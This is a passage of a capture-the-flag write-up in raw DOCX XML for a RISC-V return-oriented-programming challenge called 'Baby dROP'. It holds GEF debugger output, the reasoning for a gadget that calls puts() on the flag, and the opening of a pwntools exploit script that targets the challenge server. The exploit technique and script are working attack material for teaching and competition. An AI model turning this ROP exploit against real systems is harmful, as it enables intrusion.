          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to an value on the stack which we control, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">s0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If we check the value of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">s0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we can see that …</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">──────────────────────────────────────────────────────────────────────────────────────────────── code:riscv:RISCV ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x10f9e &lt;do_b2+74&gt;       j      0x10fa2 &lt;do_b2+78&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x10fa0 &lt;do_b2+76&gt;       li     a5, 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x10fa2 &lt;do_b2+78&gt;       mv     a0, a5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> →    0x10faa &lt;do_b2+86&gt;       ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[!] Cannot disassemble from $PC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d90│+0x0000: 0x62616166  →  0x62616166    ← $sp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d94│+0x0004: 0x62616167  →  0x62616167</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d98│+0x0008: 0x62616168  →  0x62616168</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800d9c│+0x000c: 0x62616169  →  0x62616169</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800da0│+0x0010: 0x6261616a  →  0x6261616a</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800da4│+0x0014: 0x6261616b  →  0x6261616b</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800da8│+0x0018: 0x6261616c  →  0x6261616c</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x40800dac│+0x001c: 0x6261616d  →  0x6261616d</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[#0] Id 1, stopped 0x10faa in do_b2 (), reason: BREAKPOINT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[#0] 0x10faa → do_b2(size=0x12c)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gef➤  p $s0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$1 = (void *) 0x62616164</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gef➤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">… We control it!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now we can directly jump to this gadget and set the value of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">r0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to the address of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to the value of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by modifying the appropriate stack values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: On the remote server, the stack is a little bit different due to the presence of environment variables. Therefore, the actual address of the flag changes by some offset. We can brute force the offset since we know that it is not large.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="exploit-script"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env python3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Usage: ./solve.py REMOTE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#</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zlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ELF(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"./drop-baby"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">context.arch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"riscv"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">context.bits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">32</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># context.binary = exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gdbscript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">file drop-baby</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">target remote localhost:1234</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> start():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> args.REMOTE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> remote(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"drop.quals2023-kah5Aiv9.satellitesabove.me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">5300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.sendline(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{REDACTED}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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args.GDB:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            os.system(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"tmux splitw -h gdb-multiarch -ex init-gef -x .gdbrun"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> process(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"qemu-riscv32"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"-g"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1234"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"drop-baby"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"FLAG"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{REDACTED}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"TIMEOUT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"999999999"</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io</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">APPLICATION_NAME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Baby dROP"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">A1_MSG_LEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">40</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">A2_MSG_LEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">B1_MSG_LEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">20</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">B2_MSG_LEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">300</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CC_MSG_LEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">25</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ZY_MSG_LEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SILENT_ERRORS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</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aseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> start() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> io:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># synchronize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.send(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\xde\xad\xbe\xef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># b2 msg</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.send(</w:t>
      </w:r>
      <w:r>
